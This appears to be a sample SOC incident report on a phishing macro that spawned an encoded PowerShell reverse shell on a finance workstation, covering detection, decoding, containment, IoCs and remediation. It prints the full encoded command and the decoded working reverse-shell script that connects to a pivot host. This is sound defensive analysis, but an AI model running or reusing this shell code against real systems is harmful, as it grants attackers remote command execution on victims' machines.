CrowdStrike Alert Details
Alert ID: CS-POWERSHELL-1059-7842
Alert Time: 2024-02-13 10:22:15 EST
Severity: HIGH (88/100)
Source: CrowdStrike Falcon EDR
Rule: “Suspicious PowerShell Command Line – Encoded Execution”
MITRE ATT&CK: T1059.001 – Command & Scripting Interpreter: PowerShell
Alert Details:
Detection: PowerShell executed with encoded command and hidden window
Host: FIN-WS-045 (Finance Department)
User: bturner (Brian Turner, Accountant)
Time: 10:18 EST
Process Tree:
– explorer.exe (PID: 3421)
– powershell.exe (PID: 4789)
– Command Line: powershell.exe -NoP -NonI -W Hidden -Enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYAOAAuADQANQAuADEAMgAnACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAeQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
Decoded Command:
– Reverse shell to 192.168.45.12:443
– Interactive PowerShell session
– Masquerading as normal process
Network Connection:
– Destination: 192.168.45.12:443 (Internal IP – Unusual)
– Protocol: TCP
– Status: Established at 10:19 EST
Additional Context:
– User bturner normally does not use PowerShell
– Parent process explorer.exe (unusual for PowerShell)
– Encoded command is base64 for reverse shell
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed malicious PowerShell execution
2. Command Decoding
Decode base64 command
PowerShell, CyberChef
Reverse shell to internal IP 192.168.45.12
3. Immediate Containment
Isolate host
CrowdStrike Network Containment
Host isolated; process terminated
4. Destination Investigation
Identify 192.168.45.12
Splunk, CMDB
IP belongs to ENG-WS-023 (compromised engineering workstation)
5. Second Host Isolation
Isolate C2 host
CrowdStrike
ENG-WS-023 isolated
6. User Interview
Contact both users
Phone, Teams
Both users unaware; malware identified
Jira Incident Report
Ticket: SOC-2024-066
Summary: T1059 – PowerShell Reverse Shell Execution from Finance Workstation
Status: RESOLVED
Resolution: MALICIOUS – C2 Communication Blocked
Priority: P1 – HIGH
Labels: T1059, powershell, command-interpreter, reverse-shell, crowdstrike
Components: Endpoint-Security, Incident-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Suspicious PowerShell Command Line – Encoded Execution”.
Host: FIN-WS-045 (Finance Department, user bturner).
Time: 2024-02-13 10:22 EST.
Technique: MITRE ATT&CK T1059.001 – Command & Scripting Interpreter: PowerShell.
2. Technical Analysis:
Command Analysis:
Encoded command base64 decoded to:
$client = New-Object System.Net.Sockets.TCPClient(‘192.168.45.12’,443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()
Function: Reverse shell connecting to 192.168.45.12 on port 443
Capabilities: Full interactive PowerShell session for attacker
Attack Chain:
User bturner opened phishing email attachment (Excel macro)
Macro executed PowerShell with encoded command
PowerShell established reverse shell to attacker-controlled internal host (ENG-WS-023)
Attacker used engineering workstation as C2 pivot
C2 Infrastructure:
Primary C2: 192.168.45.12 (ENG-WS-023) – Internal pivot
External C2: 185.143.221[.]89 (from engineering host logs)
Method: Chained connection (Finance → Engineering → External)
3. Investigation Findings:
Timeline:
10:15 – User opens phishing email
10:16 – Excel macro executes
10:17 – PowerShell launches with encoded command
10:18 – Reverse shell connects to ENG-WS-023
10:19 – Connection established
10:22 – CrowdStrike alert triggers
10:23 – FIN-WS-045 isolated
10:25 – ENG-WS-023 identified and isolated
Scope:
2 hosts compromised
No lateral movement beyond these hosts
No data exfiltration detected
Indicators of Compromise (IoCs):
Network:
– Internal C2: 192.168.45.12:443
– External C2: 185.143.221[.]89:443
Files:
– invoice_7823.xlsm (SHA256: a1b2c3…)
– C:\Windows\Temp\svchost.exe (SHA256: d4e5f6…)
Processes:
– powershell.exe with encoded command
4. Containment Actions:
Immediate Actions:
Isolated both hosts via CrowdStrike.
Terminated malicious processes.
Blocked external C2 IP at firewall.
Forensic Collection:
Captured memory from both hosts.
Extracted macro and payloads.
Analyzed reverse shell traffic.
Remediation:
Re-imaged both workstations.
Reset user passwords.
Phishing awareness training for users.
5. Root Cause Analysis:
Primary Cause: Phishing email with malicious macro.
Contributing Factors:
Macros enabled in Office.
No ASR rule blocking Office child processes.
Internal host used as C2 pivot (detected).
6. Business Impact:
Operational Impact: Two workstations offline for 4 hours.
Data Exposure: None (no exfiltration).
7. Remediation & Prevention:
Completed Actions:
Hosts remediated.
Users educated.
IOCs blocked.
Technical Controls Enhanced:
Enabled ASR rule “Block Office applications from creating child processes”.
Blocked macros from internet via GPO.
Enhanced PowerShell logging.
8. Conclusion:
Attackers used a phishing email with malicious macro to execute a PowerShell reverse shell, using an internal engineering workstation as a pivot. Rapid detection and containment prevented data exfiltration.
Closure Rationale: Hosts remediated; attacker blocked; enhanced controls implemented.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-13 12:00 EST